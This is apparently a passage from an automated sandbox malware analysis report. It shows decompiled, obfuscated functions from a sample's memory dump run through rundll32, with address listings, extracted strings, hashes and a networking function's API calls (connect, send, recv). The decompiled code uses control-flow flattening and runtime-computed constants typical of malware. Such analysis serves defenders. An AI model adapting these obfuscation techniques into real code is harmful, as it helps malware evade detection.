				_v1748 = 0x414330;
				_v1748 = _v1748 * 0x1d;
				_v1748 = _v1748 | 0x5a6f0d55;
				_v1748 = _v1748 ^ 0x5f6ea92a;
				_v1668 = 0xd2b255;
				_v1668 = _v1668 ^ 0xc5d7949e;
				_v1668 = _v1668 ^ 0xc50ba027;
				_v1796 = 0xab825d;
				_v1796 = _v1796 << 0xc;
				_v1796 = _v1796 + 0xd01b;
				_t618 = 0x22;
				_v1796 = _v1796 / _t618;
				_v1796 = _v1796 ^ 0x056bf222;
				_v1724 = 0x6f3f31;
				_v1724 = _v1724 + 0x5a62;
				_v1724 = _v1724 / _t674;
				_v1724 = _v1724 ^ 0x0002d040;
				_v1652 = 0x230f16;
				_v1652 = _v1652 ^ 0x902061d9;
				_v1652 = _v1652 ^ 0x9007a9ef;
				_v1804 = 0xb250d0;
				_v1804 = _v1804 << 7;
				_v1804 = _v1804 << 0xe;
				_v1804 = _v1804 >> 0x10;
				_v1804 = _v1804 ^ 0x000e0b76;
				_v1644 = 0x39b2ec;
				_v1644 = _v1644 >> 5;
				_v1644 = _v1644 ^ 0x0004ae9a;
				_v1708 = 0x41b5f8;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xfffffd74;
				_v1708 = _v1708 ^ 0x836650ae;
				_v1768 = 0xd924a5;
				_t619 = 0x26;
				_v1768 = _v1768 * 0x57;
				_v1768 = _v1768 >> 4;
				_v1768 = _v1768 ^ 0x04932b37;
				_v1788 = 0x72a9d;
				_v1788 = _v1788 >> 0xb;
				_v1788 = _v1788 * 0x3f;
				_v1788 = _v1788 + 0xffffc8d5;
				_v1788 = _v1788 ^ 0x000eb520;
				_v1628 = 0x50edf9;
				_v1628 = _v1628 * 0x73;
				_v1628 = _v1628 ^ 0x245d5801;
				_v1772 = 0x77fe3c;
				_v1772 = _v1772 + 0x89a9;
				_v1772 = _v1772 | 0x772eb6e7;
				_v1772 = _v1772 + 0xffffc435;
				_v1772 = _v1772 ^ 0x777a10e8;
				_v1780 = 0x481950;
				_v1780 = _v1780 >> 0xb;
				_v1780 = _v1780 | 0x104efd63;
				_v1780 = _v1780 + 0xffffd02c;
				_v1780 = _v1780 ^ 0x1043876c;
				_v1636 = 0x899427;
				_v1636 = _v1636 << 0x10;
				_v1636 = _v1636 ^ 0x942ef0bd;
				_v1812 = 0xafb495;
				_v1812 = _v1812 | 0xf73eef3e;
				_v1812 = _v1812 + 0xffffb280;
				_v1812 = _v1812 ^ 0xf7b4985a;
				_v1732 = 0xe6dab0;
				_v1732 = _v1732 + 0x38b;
				_v1732 = _v1732 | 0x5f912f35;
				_v1732 = _v1732 ^ 0x5ff91c81;
				_v1660 = 0xa1ff8d;
				_v1660 = _v1660 / _t619;
				_v1660 = _v1660 ^ 0x000a69c5;
				_v1820 = 0xd15a88;
				_v1820 = _v1820 ^ 0xcd50b9e8;
				_v1820 = _v1820 >> 0x10;
				_v1820 = _v1820 ^ 0xf9319330;
				_v1820 = _v1820 ^ 0xf933c487;
				_t675 = _v1600;
				while(1) {
					L1:
					while(1) {
						L2:
						_t620 = 0x424d9d2;
						do {
							L3:
							while(_t677 != 0x19ebf08) {
								if(_t677 == _t620) {
									_push(_v1600);
									_push(_v1808);
									_t585 = E007BD389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
									_t682 =  &(_t682[7]);
									__eflags = _t585;
									if(__eflags != 0) {
										E007B1E67(_v1676, _v1836, _v1684, _v1692, _v1596);
										E007B1E67(_v1828, _v1740, _v1748, _v1668, _v1592);
										_t682 =  &(_t682[6]);
									}
									L14:
									_t677 = 0x19ebf08;
									while(1) {
										L1:
										L2:
										_t620 = 0x424d9d2;
										goto L3;
									}
								}
								if(_t677 == 0x5bc69f5) {
									_t592 = E007BD2CE(_t620);
									__eflags = _t592 - E007A3DE2(_t620);
									_t583 = 0x7574965;
									_t677 = 0x8166b1d;
									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
									goto L2;
								}
								if(_t677 == 0x8166b1d) {
									__eflags = _t675 - _t583;
									if(__eflags != 0) {
										_t677 = 0xd369ee2;
										continue;
									}
									_push(_t620);
									_push(_t620);
									_t606 = E007BBB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
									_t682 =  &(_t682[6]);
									__eflags = _t606;
									if(__eflags == 0) {
										L12:
										return _t606;
									}
									_t677 = 0xd369ee2;
									goto L1;
								}
								if(_t677 == 0xb42e112) {
									_t677 = 0x5bc69f5;
									continue;
								}
								if(_t677 == 0xd369ee2) {
									E007BDA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
									 *((short*)(E007AB6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
									E007A8969(_v1688,  &_v524, __eflags, _v1620, _v1696);
									_push(_v1632);
									_push(_v1744);
									E007A47CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E007BDCF7(_v1680, 0x7a1328, __eflags),  &_v524, _v1776, _v1712);
									E007AA8B0(_v1704, _t598, _v1800);
									_t603 = E007AEA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
									_t682 =  &(_t682[0x17]);
									__eflags = _t603;
									if(__eflags != 0) {
										_t583 = 0x7574965;
										__eflags = _t675 - 0x7574965;
										_t620 = 0x424d9d2;
										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
										continue;
									}
									goto L14;
								}
								_t696 = _t677 - 0xe2e667c;
								if(_t677 != 0xe2e667c) {
									goto L25;
								}
								_push(_v1804);
								_push( &_v1564);
								_push(_t620);
								_push(0);
								_push( &_v1596);
								_push(_v1652);
								_push(0);
								_t606 = E007AAB87(_v1796, _v1724, _t696);
								if(_t606 == 0) {
									goto L12;
								}
								E007B1E67(_v1644, _v1708, _v1768, _v1788, _v1596);
								return E007B1E67(_v1628, _v1772, _v1780, _v1636, _v1592);
							}
							E007B1E67(_v1812, _v1732, _v1660, _v1820, _v1600);
							_t682 =  &(_t682[3]);
							_t677 = 0xe6feec1;
							_t583 = 0x7574965;
							_t620 = 0x424d9d2;
							L25:
							__eflags = _t677 - 0xe6feec1;
						} while (__eflags != 0);
						return _t583;
					}
				}
			}

0x007b6df8
0x007b6dfe
0x007b6e0b
0x007b6e14
0x007b6e1b
0x007b6e22
0x007b6e2d
0x007b6e38
0x007b6e40
0x007b6e4b
0x007b6e53
0x007b6e64
0x007b6e68
0x007b6e6a
0x007b6e6f
0x007b6e74
0x007b6e7c
0x007b6e87
0x007b6e92
0x007b6e9d
0x007b6ea8
0x007b6eb0
0x007b6ebb
0x007b6ec3
0x007b6ecb
0x007b6ed3
0x007b6edb
0x007b6ee3
0x007b6ef7
0x007b6efc
0x007b6f05
0x007b6f10
0x007b6f18
0x007b6f20
0x007b6f28
0x007b6f30
0x007b6f38
0x007b6f43
0x007b6f4b
0x007b6f56
0x007b6f5e
0x007b6f63
0x007b6f6b
0x007b6f73
0x007b6f7b
0x007b6f80
0x007b6f89
0x007b6f8a
0x007b6f8e
0x007b6f96
0x007b6fa1
0x007b6fa9
0x007b6fb4
0x007b6fbf
0x007b6fc7
0x007b6fd5
0x007b6fd9
0x007b6fe1
0x007b6fec
0x007b6ff7
0x007b7002
0x007b700d
0x007b7020
0x007b7027
0x007b7032
0x007b703d
0x007b7050
0x007b7055
0x007b705e
0x007b7069
0x007b7071
0x007b7079
0x007b7081
0x007b7089
0x007b7094
0x007b709f
0x007b70aa
0x007b70b5
0x007b70c0
0x007b70cb
0x007b70d6
0x007b70e1
0x007b70ec
0x007b70fe
0x007b7103
0x007b710c
0x007b7117
0x007b711f
0x007b7129
0x007b712c
0x007b7130
0x007b7138
0x007b714b
0x007b7152
0x007b715d
0x007b7168
0x007b7173
0x007b717e
0x007b7186
0x007b718e
0x007b7193
0x007b719b
0x007b71a3
0x007b71b6
0x007b71bd
0x007b71c8
0x007b71d0
0x007b71d5
0x007b71da
0x007b71e2
0x007b71ea
0x007b7200
0x007b7207
0x007b720f
0x007b721a
0x007b7225
0x007b7230
0x007b723b
0x007b7248
0x007b7249
0x007b7253
0x007b7257
0x007b725c
0x007b7264
0x007b726f
0x007b727a
0x007b7285
0x007b7296
0x007b7299
0x007b729d
0x007b72a5
0x007b72ad
0x007b72b5
0x007b72bd
0x007b72c7
0x007b72cb
0x007b72d3
0x007b72e6
0x007b72ed
0x007b72f8
0x007b7303
0x007b730e
0x007b7319
0x007b7324
0x007b732c
0x007b7344
0x007b7348
0x007b7350
0x007b7363
0x007b7366
0x007b736d
0x007b7378
0x007b7380
0x007b7388
0x007b738d
0x007b7395
0x007b739d
0x007b73a8
0x007b73b0
0x007b73bb
0x007b73c3
0x007b73cb
0x007b73d0
0x007b73d5
0x007b73dd
0x007b73e8
0x007b73f0
0x007b73fb
0x007b740f
0x007b7416
0x007b7421
0x007b742e
0x007b7432
0x007b743a
0x007b743f
0x007b7447
0x007b744f
0x007b7454
0x007b7459
0x007b7461
0x007b746e
0x007b7472
0x007b747a
0x007b7482
0x007b748d
0x007b7498
0x007b74a3
0x007b74ab
0x007b74b0
0x007b74be
0x007b74c8
0x007b74cc
0x007b74d4
0x007b74df
0x007b74f5
0x007b74fe
0x007b7509
0x007b7514
0x007b751f
0x007b752a
0x007b7532
0x007b7537
0x007b753c
0x007b7541
0x007b7549
0x007b7554
0x007b755c
0x007b7567
0x007b7572
0x007b757a
0x007b7585
0x007b7590
0x007b759d
0x007b759e
0x007b75a2
0x007b75a7
0x007b75af
0x007b75b7
0x007b75c1
0x007b75c5
0x007b75cd
0x007b75d5
0x007b75e8
0x007b75ef
0x007b75fa
0x007b7602
0x007b760a
0x007b7612
0x007b761a
0x007b7622
0x007b762a
0x007b762f
0x007b7637
0x007b763f
0x007b7647
0x007b7652
0x007b765a
0x007b7665
0x007b766d
0x007b7675
0x007b767d
0x007b7685
0x007b7690
0x007b769b
0x007b76a6
0x007b76b1
0x007b76c5
0x007b76cc
0x007b76d7
0x007b76df
0x007b76e7
0x007b76ec
0x007b76f4
0x007b76fc
0x007b7703
0x007b7703
0x007b7708
0x007b7708
0x007b7708
0x007b770d
0x00000000
0x007b770d
0x007b7717
0x007b799c
0x007b79aa
0x007b79ca
0x007b79cf
0x007b79d2
0x007b79d4
0x007b79fa
0x007b7a1f
0x007b7a24
0x007b7a24
0x007b78e9
0x007b78e9
0x007b7703
0x007b7703
0x007b7708
0x007b7708
0x00000000
0x007b7708
0x007b7703
0x007b7723
0x007b7977
0x007b7983
0x007b798a
0x007b798f
0x007b7994
0x00000000
0x007b7994
0x007b772f
0x007b7913
0x007b7915
0x007b7957
0x00000000
0x007b7957
0x007b7917
0x007b7918
0x007b793d
0x007b7942
0x007b7945
0x007b7947
0x007b77e4
0x007b77e4
0x007b77e4
0x007b794d
0x00000000
0x007b794d
0x007b773b
0x007b7909
0x00000000
0x007b7909
0x007b7747
0x007b7804
0x007b783e
0x007b7848
0x007b784d
0x007b7859
0x007b78a6
0x007b78b8
0x007b78dd
0x007b78e2
0x007b78e5
0x007b78e7
0x007b78f0
0x007b78fa
0x007b78fc
0x007b7901
0x00000000
0x007b7901
0x00000000
0x007b78e7
0x007b774d
0x007b7753
0x00000000
0x00000000
0x007b7759
0x007b7764
0x007b7765
0x007b7766
0x007b776f
0x007b7770
0x007b7782
0x007b7784
0x007b778e
0x00000000
0x00000000
0x007b77ad
0x00000000
0x007b77d7
0x007b7a49
0x007b7a4e
0x007b7a51
0x007b7a56
0x007b7a5b
0x007b7a60
0x007b7a60
0x007b7a60
0x00000000
0x007b770d
0x007b7708

Strings

ci1, xrefs: 007B6E4B
>GU, xrefs: 007B6F96
UoZ, xrefs: 007B7472
v(, xrefs: 007B7378
CmN, xrefs: 007B6E9D
X9, xrefs: 007B7069
^P>, xrefs: 007B7032
bZ, xrefs: 007B74DF
1?o, xrefs: 007B74D4
G^FX, xrefs: 007B6EDB
;X, xrefs: 007B7285
f, xrefs: 007B6E92

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
API String ID: 0-2206596976
Opcode ID: ffc6f0c5af2e6787cee299b348372ae7937bb449230f03820cf2d8f7a9949abc
Instruction ID: 20be3fd70f3f57e9484d499197e06a11bd60f47e7ccc38d9dabbc4a1b321bc07
Opcode Fuzzy Hash: ffc6f0c5af2e6787cee299b348372ae7937bb449230f03820cf2d8f7a9949abc
Instruction Fuzzy Hash: 1D52FC715083819BD378CF21C98AB9BBBE1BBC4308F108A1DE5DA96260D7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10012C6C
connect.WS2_32(?,?,00000010), ref: 10012CA7
_strcat.LIBCMT ref: 10012CE9
send.WS2_32(?,?,00000064,00000000), ref: 10012D06
recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D

Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03

Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7

Part of subcall function 1001DD46: GetDlgItem.USER32(?,2A2BF92F), ref: 1001DD53

Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B

Strings

Wait..., xrefs: 10012CB1
Disconnected, xrefs: 10012E4A
Connected, xrefs: 10012D4C

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$EnableItemText_memset_strcatconnectrecvsend
String ID: Connected$Disconnected$Wait...
API String ID: 2263617321-2304371739
Opcode ID: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
Instruction ID: 809deafcd8a1ebdff950075e8a5ab3cba01c3ccaf73ffb16f134ff4a091f78a6
Opcode Fuzzy Hash: 5b08e9dbcbe72183f65bc00083dd8b9667ad7d5dfeacba7cbb0734b26863e533
Instruction Fuzzy Hash: 88513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44

Uniqueness

Uniqueness Score: -1.00%

Function 007A2251 Relevance: 14.1, Strings: 11, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007A2251(void* __ecx, signed int* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t323;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				void* _t382;
				signed int* _t424;
				void* _t427;
				void* _t428;
				void* _t431;

				_t425 = _a4;
				_push(_a12);
				_t424 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t323);
				_v104 = 0xfd7ba2;
				_t428 = _t427 + 0x14;
				_v104 = _v104 << 2;
				_v104 = _v104 ^ 0x03f5ee88;
				_t382 = 0x3e8dc94;
				_v112 = 0x53a35e;
				_t371 = 0x1c;
				_v112 = _v112 / _t371;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0x17ec1018;
				_v100 = 0x45b9a1;
				_v100 = _v100 + 0xffff7cfc;
				_v100 = _v100 ^ 0x004aa95b;
				_v92 = 0xd93693;
				_v92 = _v92 + 0xb87a;
				_v92 = _v92 ^ 0x00df4f59;
				_v160 = 0x746cf1;
				_v160 = _v160 ^ 0x2b133776;
				_v160 = _v160 + 0xffff944c;
				_v160 = _v160 / _t371;
				_v160 = _v160 ^ 0x0189d9d1;
				_v144 = 0x9ec305;
				_v144 = _v144 + 0xffffd43e;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04f670ec;
				_v148 = 0x64c482;
				_v148 = _v148 + 0x3823;
				_t372 = 0x6f;
				_v148 = _v148 / _t372;
				_v148 = _v148 ^ 0x000f1a49;
				_v68 = 0x131d36;
				_v68 = _v68 ^ 0xb06b804d;
				_v68 = _v68 ^ 0xb072f73d;
				_v124 = 0xcf68d3;
				_v124 = _v124 + 0x418a;
				_v124 = _v124 + 0xdb2c;
				_v124 = _v124 ^ 0x00d4c88c;
				_v140 = 0x60ea9a;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 >> 4;
				_v140 = _v140 ^ 0x0002f747;
				_v116 = 0xa906b8;
				_t373 = 0x61;
				_v116 = _v116 * 0x66;
				_v116 = _v116 / _t373;
				_v116 = _v116 ^ 0x00b9e105;
				_v152 = 0x1b4b23;
				_v152 = _v152 + 0x6529;
				_v152 = _v152 << 7;
				_v152 = _v152 ^ 0x0dd37b6c;
				_v56 = 0xb64e13;
				_t374 = 0x36;
				_v56 = _v56 / _t374;
				_v56 = _v56 ^ 0x000ccadc;
				_v180 = 0xa61587;
				_v180 = _v180 ^ 0x79fc160a;
				_t375 = 0x7a;
				_v180 = _v180 * 0x16;
				_v180 = _v180 ^ 0x4f1bf23d;
				_v180 = _v180 ^ 0x22abe71e;
				_v120 = 0x473252;
				_v120 = _v120 + 0xffff4692;
				_v120 = _v120 / _t375;
				_v120 = _v120 ^ 0x000f54d2;
				_v60 = 0x2fd158;
				_v60 = _v60 + 0x5b64;
				_v60 = _v60 ^ 0x0034a0e9;
				_v84 = 0xc57bbf;
				_v84 = _v84 ^ 0x7beef004;
				_v84 = _v84 ^ 0x7b204221;
				_v52 = 0xc39e48;
				_t376 = 0x4d;
				_v52 = _v52 / _t376;
				_v52 = _v52 ^ 0x0006d078;
				_v108 = 0x102acf;
				_v108 = _v108 >> 0xa;
				_v108 = _v108 ^ 0x000242b6;
				_v80 = 0xaaee53;
				_t377 = 0x79;
				_v80 = _v80 * 0x74;
				_v80 = _v80 ^ 0x4d7dabdb;
				_v88 = 0x1ad2b9;
				_v88 = _v88 | 0x310da8db;
				_v88 = _v88 ^ 0x311cb062;
				_v136 = 0x81cc6c;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 << 0xd;
				_v136 = _v136 ^ 0x0107e876;
				_v96 = 0x2bc0c4;
				_v96 = _v96 * 0x4c;
				_v96 = _v96 ^ 0x0cfd01fe;
				_v176 = 0x403c4e;
				_t174 =  &_v176; // 0x403c4e
				_v176 =  *_t174 / _t377;
				_t180 =  &_v176; // 0x403c4e
				_v176 =  *_t180 * 0x5e;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x0632c8a8;
				_v44 = 0x1618ce;
				_v44 = _v44 + 0xffff8813;
				_v44 = _v44 ^ 0x00124c47;
				_v76 = 0x551030;
				_v76 = _v76 + 0x65ef;
				_v76 = _v76 ^ 0x005f521e;
				_v132 = 0xb7ed4f;
				_v132 = _v132 << 0xb;
				_v132 = _v132 >> 0xa;
				_v132 = _v132 ^ 0x002e4b92;
				_v64 = 0xfb13c3;
				_v64 = _v64 * 0x16;
				_v64 = _v64 ^ 0x159ca6b2;
				_v168 = 0x8e8363;
				_v168 = _v168 ^ 0x49fc5726;
				_v168 = _v168 >> 8;
				_v168 = _v168 >> 4;
				_v168 = _v168 ^ 0x0002bf0f;
				_v72 = 0x8b4c84;
				_t378 = 0x68;
				_v72 = _v72 / _t378;
				_v72 = _v72 ^ 0x00015b8a;
				_v128 = 0x282e65;
				_v128 = _v128 >> 3;
				_v128 = _v128 << 9;
				_v128 = _v128 ^ 0x0a079d52;
				_v156 = 0xadd370;
				_t379 = 0x3e;
				_v156 = _v156 / _t379;
				_v156 = _v156 << 0xf;
				_v156 = _v156 + 0xffff35e7;
				_v156 = _v156 ^ 0x66d9d095;
				_v164 = 0xb0b7ce;
				_v164 = _v164 + 0xffffdc7a;
				_v164 = _v164 * 0x61;
				_v164 = _v164 + 0xffff24b0;
				_v164 = _v164 ^ 0x42ea90cd;
				_v172 = 0xee7b33;
				_v172 = _v172 | 0x904c1683;
				_v172 = _v172 * 0x2c;
				_v172 = _v172 >> 4;
				_v172 = _v172 ^ 0x0e8d9d52;
				_v48 = 0xdaf5e6;
				_v48 = _v48 ^ 0xf4ca4d64;
				_v48 = _v48 ^ 0xf41f1779;
				goto L1;
				do {
					while(1) {
						L1:
						_t431 = _t382 - 0x9c1484f;
						if(_t431 > 0) {
							break;
						}
						if(_t431 == 0) {
							E007A3DBC( &_v40, _t424, _v160, _v144, _v148);
							_t428 = _t428 + 0xc;
							_t382 = 0x9229f3e;
							continue;
						} else {
							if(_t382 == 0x3e8dc94) {
								_t382 = 0xb0d10f2;
								 *_t424 =  *_t424 & 0x00000000;
								_t424[1] = _v104;
								continue;
							} else {
								if(_t382 == 0x73dcb22) {
									E007B0DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
									_t428 = _t428 + 0x10;
									_t382 = 0xca0d778;
									continue;
								} else {
									if(_t382 == 0x8cfc35c) {
										E007B0DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
										_t428 = _t428 + 0x10;
										_t382 = 0xfa9ed0f;
										continue;
									} else {
										if(_t382 == 0x9229f3e) {
											E007C0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
											_t428 = _t428 + 0x10;
											_t382 = 0xa7e786e;
											continue;
										} else {
											if(_t382 != 0x95701e8) {
												goto L24;
											} else {
												_push(_t382);
												_push(_t382);
												_t369 = E007A7FF2(_t424[1]);
												 *_t424 = _t369;
												if(_t369 != 0) {
													_t382 = 0x9c1484f;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t424;
						_t322 =  *_t424 != 0;
						__eflags = _t322;
						return 0 | _t322;
					}
					__eflags = _t382 - 0xa7e786e;
					if(_t382 == 0xa7e786e) {
						E007B0DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
						_t428 = _t428 + 0x10;
						_t382 = 0x8cfc35c;
						goto L24;
					} else {
						__eflags = _t382 - 0xa84b454;
						if(__eflags == 0) {
							E007C0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
						} else {
							__eflags = _t382 - 0xb0d10f2;
							if(_t382 == 0xb0d10f2) {
								_t424[1] = E007BC631(_t425);
								_t382 = 0x95701e8;
								goto L1;
							} else {
								__eflags = _t382 - 0xca0d778;
								if(_t382 == 0xca0d778) {
									E007B0DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
									_t428 = _t428 + 0x10;
									_t382 = 0xa84b454;
									goto L1;
								} else {
									__eflags = _t382 - 0xfa9ed0f;
									if(_t382 != 0xfa9ed0f) {
										goto L24;
									} else {
										E007B0DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
										_t428 = _t428 + 0x10;
										_t382 = 0x73dcb22;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t382 - 0xd4a25d5;
				} while (__eflags != 0);
				goto L27;
			}

0x007a225a
0x007a2262
0x007a2269
0x007a226b
0x007a2272
0x007a2273
0x007a2274
0x007a2275
0x007a227a
0x007a2282
0x007a2285
0x007a228c
0x007a2294
0x007a2299
0x007a22a7
0x007a22ac
0x007a22b0
0x007a22b5
0x007a22bd
0x007a22c5
0x007a22cd
0x007a22d5
0x007a22dd
0x007a22e5
0x007a22ed
0x007a22f5
0x007a22fd
0x007a230d
0x007a2313
0x007a231b
0x007a2323
0x007a232b
0x007a2330
0x007a2338
0x007a2340
0x007a234c
0x007a2351
0x007a2357
0x007a235f
0x007a236a
0x007a2375
0x007a2380
0x007a2388
0x007a2390
0x007a2398
0x007a23a0
0x007a23a8
0x007a23ad
0x007a23b2
0x007a23ba
0x007a23c7
0x007a23c8
0x007a23d2
0x007a23d6
0x007a23de
0x007a23e6
0x007a23ee
0x007a23f3
0x007a23fd
0x007a2411
0x007a2416
0x007a241f
0x007a242a
0x007a2432
0x007a243f
0x007a2442
0x007a2446
0x007a244e
0x007a2456
0x007a245e
0x007a246e
0x007a2472
0x007a247a
0x007a2485
0x007a2490
0x007a249b
0x007a24a3
0x007a24ab
0x007a24b3
0x007a24c5
0x007a24ca
0x007a24d3
0x007a24de
0x007a24e6
0x007a24eb
0x007a24f3
0x007a2500
0x007a2501
0x007a2505
0x007a250d
0x007a2515
0x007a251d
0x007a2525
0x007a252d
0x007a2532
0x007a2537
0x007a253f
0x007a254c
0x007a2550
0x007a2558
0x007a2560
0x007a2566
0x007a256a
0x007a256f
0x007a2573
0x007a2578
0x007a2580
0x007a258b
0x007a2596
0x007a25a1
0x007a25a9
0x007a25b1
0x007a25b9
0x007a25c1
0x007a25c6
0x007a25cb
0x007a25d3
0x007a25e6
0x007a25ed
0x007a25f8
0x007a2600
0x007a2608
0x007a260d
0x007a2612
0x007a261c
0x007a2635
0x007a263a
0x007a2643
0x007a264e
0x007a2656
0x007a265b
0x007a2660
0x007a2668
0x007a2674
0x007a267c
0x007a2680
0x007a2685
0x007a268d
0x007a2695
0x007a269d
0x007a26aa
0x007a26ae
0x007a26b6
0x007a26be
0x007a26c6
0x007a26d3
0x007a26d7
0x007a26dc
0x007a26e4
0x007a26ef
0x007a26fa
0x007a26fa
0x007a2705
0x007a2705
0x007a2705
0x007a2705
0x007a2707
0x00000000
0x00000000
0x007a270d
0x007a282a
0x007a282f
0x007a2832
0x00000000
0x007a2713
0x007a2719
0x007a2808
0x007a280a
0x007a280d
0x00000000
0x007a271f
0x007a2725
0x007a27f2
0x007a27f7
0x007a27fa
0x00000000
0x007a272b
0x007a2731
0x007a27c0
0x007a27c5
0x007a27c8
0x00000000
0x007a2733
0x007a2739
0x007a278b
0x007a2790
0x007a2793
0x00000000
0x007a273b
0x007a2741
0x00000000
0x007a2747
0x007a2756
0x007a2757
0x007a2758
0x007a275d
0x007a2763
0x007a2769
0x00000000
0x007a2769
0x007a2763
0x007a2741
0x007a2739
0x007a2731
0x007a2725
0x007a2719
0x007a293e
0x007a2940
0x007a2945
0x007a2945
0x007a294f
0x007a294f
0x007a283c
0x007a2842
0x007a28fd
0x007a2902
0x007a2905
0x00000000
0x007a2848
0x007a2848
0x007a284e
0x007a2936
0x007a2854
0x007a2854
0x007a2856
0x007a28d3
0x007a28d6
0x00000000
0x007a2858
0x007a2858
0x007a285e
0x007a28ba
0x007a28bf
0x007a28c2
0x00000000
0x007a2860
0x007a2860
0x007a2866
0x00000000
0x007a286c
0x007a2889
0x007a288e
0x007a2891
0x00000000
0x007a2891
0x007a2866
0x007a285e
0x007a2856
0x007a284e
0x00000000
0x007a290a
0x007a290a
0x007a290a
0x00000000

Strings

)e, xrefs: 007A23E6
3{, xrefs: 007A26BE
d[, xrefs: 007A2485
e.(, xrefs: 007A264E
nx~, xrefs: 007A2793
e, xrefs: 007A25A9
nx~, xrefs: 007A283C
!B {, xrefs: 007A24AB
N<@, xrefs: 007A2560
#8, xrefs: 007A2340
R2G, xrefs: 007A2456

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
API String ID: 0-245365489
Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
Instruction ID: 34cc58ec70fdc856406a836aa9f4d8c3f456ae93a92520bee0c2639328f06c91
Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
Instruction Fuzzy Hash: 50F14171508380DFD368CF65C88AA5BFBE1FBD5348F108A0DF29A86261D7B58959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 007A9714 Relevance: 14.0, Strings: 11, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

